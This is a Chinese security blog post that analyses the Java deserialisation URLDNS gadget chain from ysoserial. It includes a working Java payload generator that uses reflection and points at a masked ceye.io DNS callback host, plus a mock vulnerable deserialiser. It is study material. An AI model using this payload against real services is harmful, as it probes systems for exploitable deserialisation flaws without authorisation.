<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Java反序列化(1)-URLDNS链分析 | IgTa's Blog</title><meta name="description" content="Java反序列化(1)-URLDNS链分析"><meta name="keywords" content="Java安全"><meta name="author" content="Zhang Haonan"><meta name="copyright" content="Zhang Haonan"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"><link rel="preconnect" href="//busuanzi.ibruce.info"><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Java反序列化(1)-URLDNS链分析"><meta name="twitter:description" content="Java反序列化(1)-URLDNS链分析"><meta name="twitter:image" content="https://igta24.github.io/img/post.jpg"><meta property="og:type" content="article"><meta property="og:title" content="Java反序列化(1)-URLDNS链分析"><meta property="og:url" content="https://igta24.github.io/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/"><meta property="og:site_name" content="IgTa's Blog"><meta property="og:description" content="Java反序列化(1)-URLDNS链分析"><meta property="og:image" content="https://igta24.github.io/img/post.jpg"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>var autoChangeMode = 'false'
var t = Cookies.get("theme")
if (autoChangeMode == '1'){
  var isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
  var isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
  var isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined){
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport){
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour < 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
  }
  } else if (t == 'light') activateLightMode()
  else activateDarkMode()

} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="canonical" href="https://igta24.github.io/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/"><link rel="prev" title="Java反序列化(2)-CC1链分析" href="https://igta24.github.io/2022/11/03/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-2-CC1%E9%93%BE%E5%88%86%E6%9E%90/"><link rel="next" title="vulnhub系列-渗透测试" href="https://igta24.github.io/2020/12/04/vulnhub%E7%B3%BB%E5%88%97-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"cookieDomain":"https://xxx/","msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  bookmark: {
    message_prev: 'Press',
    message_next: 'to bookmark this page'
  },
  runtime_unit: 'days',
  runtime: true,
  copyright: undefined,
  ClickShowText: {"text":"别点,痛","fontSize":"15px"},
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  highlightShrink: 'false',
  isFontAwesomeV5: false,
  isPhotoFigcaption: false
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isSidebar: true  
  }</script><noscript><style>
#page-header {
  opacity: 1
}
.justified-gallery img{
  opacity: 1
}
</style></noscript><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="IgTa's Blog" type="application/atom+xml">
<script>function loadCss(l){var d=document,h=d.head,s=d.createElement('link');s.rel='stylesheet';s.href=l;!function e(f){if (d.body)return f();setTimeout(function(){e(f)})}(function(){h.appendChild(s);});}loadCss('/style.css');loadCss('https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css');loadCss('https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css');loadCss('https://fonts.googleapis.com/css?family=Titillium+Web');loadCss('https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css');</script><noscript><link rel="stylesheet" href="/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"></noscript></head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">14</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">Tags</div><div class="length_num">6</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> List</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> Movie</span></a></li></ul></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Java反序列化-1-URLDNS链分析"><span class="toc-number">1.</span> <span class="toc-text">Java反序列化(1)-URLDNS链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#URLDNS介绍"><span class="toc-number">1.1.</span> <span class="toc-text">URLDNS介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用链分析"><span class="toc-number">1.2.</span> <span class="toc-text">利用链分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用反射构造payload"><span class="toc-number">1.3.</span> <span class="toc-text">利用反射构造payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#思考"><span class="toc-number">1.4.</span> <span class="toc-text">思考</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考文章"><span class="toc-number">1.5.</span> <span class="toc-text">参考文章</span></a></li></ol></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(/img/post.jpg)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">IgTa's Blog</a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> List</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> Music</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> Movie</span></a></li></ul></div></div><span class="toggle-menu close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span></span></div><div id="post-info"><div id="post-title"><div class="posttitle">Java反序列化(1)-URLDNS链分析</div></div><div id="post-meta"><div class="meta-firstline"><time class="post-meta__date"><span class="post-meta__date-created" title="Created 2022-10-30 17:46:41"><i class="fa fa-calendar" aria-hidden="true"></i> Created 2022-10-30</span><span class="post-meta__separator">|</span><span class="post-meta__date-updated" title="Updated 2022-11-02 16:36:21"><i class="fa fa-history" aria-hidden="true"></i> Updated 2022-11-02</span></time></div><div class="meta-secondline"> </div><div class="meta-thirdline"><span class="post-meta-pv-cv"><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>Post View:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-commentcount"></span></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div id="article-container"><h1 id="Java反序列化-1-URLDNS链分析"><a href="#Java反序列化-1-URLDNS链分析" class="headerlink" title="Java反序列化(1)-URLDNS链分析"></a>Java反序列化(1)-URLDNS链分析</h1><h2 id="URLDNS介绍"><a href="#URLDNS介绍" class="headerlink" title="URLDNS介绍"></a>URLDNS介绍</h2><p>URLDNS是java反序列化payload生成工具<a href="https://github.com/frohoff/ysoserial" target="_blank" rel="noopener">ysoserial</a>中的一条利用链的名字，其触发的结果是发起一次DNS请求。因为该链通过Java内置类HashMap构造，对第三方库没有依赖，并且可以在目标无回显时发起DNS请求，很适合用于验证是否存在反序列化漏洞。</p>
<p>以下为ysoserial中生成URLDNS链payload的核心代码。</p>
<figure class="highlight java"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> Object <span class="title">getObject</span><span class="params">(<span class="keyword">final</span> String url)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"></span><br><span class="line">                <span class="comment">//Avoid DNS resolution during payload creation</span></span><br><span class="line">                <span class="comment">//Since the field &lt;code&gt;java.net.URL.handler&lt;/code&gt; is transient, it will not be part of the serialized payload.</span></span><br><span class="line">                URLStreamHandler handler = <span class="keyword">new</span> SilentURLStreamHandler();</span><br><span class="line"></span><br><span class="line">                HashMap ht = <span class="keyword">new</span> HashMap(); <span class="comment">// HashMap that will contain the URL</span></span><br><span class="line">                URL u = <span class="keyword">new</span> URL(<span class="keyword">null</span>, url, handler); <span class="comment">// URL to use as the Key</span></span><br><span class="line">                ht.put(u, url); <span class="comment">//The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.</span></span><br><span class="line"></span><br><span class="line">                Reflections.setFieldValue(u, <span class="string">"hashCode"</span>, -<span class="number">1</span>); <span class="comment">// During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.</span></span><br><span class="line"></span><br><span class="line">                <span class="keyword">return</span> ht;</span><br><span class="line">        }</span><br></pre></td></tr></tbody></table></figure>

<p>分析后可知，通过构造URL类的对象作为键名传入HashMap，当URL类的对象的hashCode值被计算时，将引发DNS请求。</p>
<p>这篇文章从ysoserial构造URLDNS Payload的角度，分析了URLDNS链执行序列化和反序列化的过程：<a href="https://mp.weixin.qq.com/s/MiBpBHRUkJbEwTcERgEx5w" target="_blank" rel="noopener">Java反序列化之ysoserial URLDNS模块分析 (qq.com)</a></p>
<h2 id="利用链分析"><a href="#利用链分析" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>由HashMap的readObject方法入手，分析URLDNS链。</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/1.jpg" alt=""></p>
<p>重点关注此处对键key的hash操作，跟进。</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/2.jpg" alt=""></p>
<p>调用了key的hashCode方法，查看URL类的hashCode方法。</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/3.jpg" alt=""></p>
<p>若URL类的hashCode类值不为-1，则调用handler的hashCode方法，此处的handler为URLStreamHandler类的对象，继续跟进其 hashCode方法</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/4.jpg" alt=""></p>
<p>调用了getHostAddress</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/5.jpg" alt=""></p>
<p>InetAddress.getByName(host) 的作用是根据主机名获得对应的IP地址，即发起DNS查询，至此，整个URLDNS链分析完成。</p>
<h2 id="利用反射构造payload"><a href="#利用反射构造payload" class="headerlink" title="利用反射构造payload"></a>利用反射构造payload</h2><p>通过以上分析，我们可知，URLDNS利用链为</p>
<ol>
<li>HashMap-&gt;readObject()</li>
<li>HashMap-&gt;hash() </li>
<li>URL-&gt;hashCode()</li>
<li>URLStreamHandler-&gt;hashCode()</li>
<li>URLStreamHandler-&gt;getHostAddress() </li>
<li>InetAddress-&gt;getByName()</li>
</ol>
<p>开始编写payload生成代码</p>
<figure class="highlight java"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.FileOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">SerializationTest</span> </span>{</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> IOException </span>{</span><br><span class="line">        ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span class="string">"test.bin"</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line">        HashMap hashmap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        <span class="comment">// 利用ceye的DNS平台检验payload</span></span><br><span class="line">        URL url = <span class="keyword">new</span> URL(<span class="string">"http://*****.ceye.io"</span>);</span><br><span class="line">        <span class="comment">// 通过反射修改url对象的属性值</span></span><br><span class="line">        <span class="comment">// url类的hashCode为私有属性，默认值为-1</span></span><br><span class="line">        Class clazz = url.getClass();</span><br><span class="line">        Field field = clazz.getDeclaredField(<span class="string">"hashCode"</span>);</span><br><span class="line">        <span class="comment">// 设置后可通过反射修改私有属性</span></span><br><span class="line">        field.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        <span class="comment">// hashmap.put会调用hash(key)导致触发DNS请求，所以将url对象的hashCode值修改为非-1</span></span><br><span class="line">        field.set(url, <span class="number">123</span>);</span><br><span class="line">        hashmap.put(url, <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// 将hashCode值修改回-1，以便反序列化时触发利用链</span></span><br><span class="line">        field.set(url, -<span class="number">1</span>);</span><br><span class="line">        serialize(hashmap);</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>编写代码模拟反序列化漏洞</p>
<figure class="highlight java"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">UnserializationTest</span> </span>{</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">unserialize</span><span class="params">(String Filename)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>{</span><br><span class="line">        ObjectInputStream ois = <span class="keyword">new</span> ObjectInputStream(<span class="keyword">new</span> FileInputStream(Filename));</span><br><span class="line">        Object obj = ois.readObject();</span><br><span class="line">        <span class="keyword">return</span> obj;</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>{</span><br><span class="line">        unserialize(<span class="string">"test.bin"</span>);</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>

<p>利用第三方的DNS反连平台，可以发现请求成功，证实存在反序列化漏洞的利用点。</p>
<p><img src="/" class="lazyload" data-src="/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/6.jpg" alt=""></p>
<h2 id="思考"><a href="#思考" class="headerlink" title="思考"></a>思考</h2><p>1.怎样会造成Java反序列化漏洞？</p>
<p>入口类(source点)的参数中包含可控类，并且该可控类在readObect方法中被调用，可作为跳板，经过有限次跳转、调用(套娃)，最终调用某个类的危险方法(sink点)，造成RCE、SSRF危害。</p>
<p>2.怎样的是好的source点？</p>
<p>实现了Serialize接口且重写了readObject方法，jdk自带的或是java中常使用的(如HashMap)，调用了常见函数(如hashCode)，参数类型宽泛(HashMap的参数类型是Object)。</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p>Java安全漫谈 - 08.反序列化篇(2)</p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">Zhang Haonan</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://igta24.github.io/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/">https://igta24.github.io/2022/10/30/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-1-URLDNS%E9%93%BE%E5%88%86%E6%9E%90/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Java%E5%AE%89%E5%85%A8/">Java安全</a></div><div class="post_share"><div class="social-share" data-image="/img/post.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> Donate<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付寶"><div class="post-qr-code__desc">支付寶</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2022/11/03/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-2-CC1%E9%93%BE%E5%88%86%E6%9E%90/"><img class="prev_cover lazyload" data-src="/img/post.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">Java反序列化(2)-CC1链分析</div></div></a></div><div class="next-post pull_right"><a href="/2020/12/04/vulnhub%E7%B3%BB%E5%88%97-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><img class="next_cover lazyload" data-src="/img/post.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">vulnhub系列-渗透测试</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> Recommend</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2022/11/03/Java反序列化-2-CC1链分析/" title="Java反序列化(2)-CC1链分析"><img class="relatedPosts_cover lazyload" data-src="/img/post.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2022-11-03</div><div class="relatedPosts_title">Java反序列化(2)-CC1链分析</div></div></a></div><div class="relatedPosts_item"><a href="/2022/11/11/Java反序列化-3-使用LazyMap构造CC1链/" title="Java反序列化(3)-使用LazyMap构造CC1链"><img class="relatedPosts_cover lazyload" data-src="/img/post.jpg"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2022-11-11</div><div class="relatedPosts_title">Java反序列化(3)-使用LazyMap构造CC1链</div></div></a></div></div><div class="clear_both"></div></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">©2020 - 2022 By Zhang Haonan</div><div class="framework-info"><span>Driven </span><a href="https://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="Read Mode"></i><i class="fa fa-plus" id="font_plus" title="Increase font size"></i><i class="fa fa-minus" id="font_minus" title="Decrease font size"></i><a class="translate_chn_to_cht" id="translateLink" href="javascript:translatePage();" title="Traditional Chinese and Simplified Chinese Conversion" target="_self">繁</a><i class="darkmode fa fa-moon-o" id="darkmode" title="Dark Mode"></i></div><div id="rightside-config-show"><div id="rightside_config" title="Setting"><i class="fa fa-cog" aria-hidden="true"></i></div><i class="fa fa-list-ul close" id="mobile-toc-button" title="Table of Contents" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="Back to top" aria-hidden="true"></i></div></section><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script async="" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><script src="/bundle.js"></script><script async>window.onload=function(){var a=document.createElement('script'),b=document.getElementsByTagName('script')[0];a.type='text/javascript',a.async=!0,a.src='/sw-register.js?v='+Date.now(),b.parentNode.insertBefore(a,b)};</script></body></html>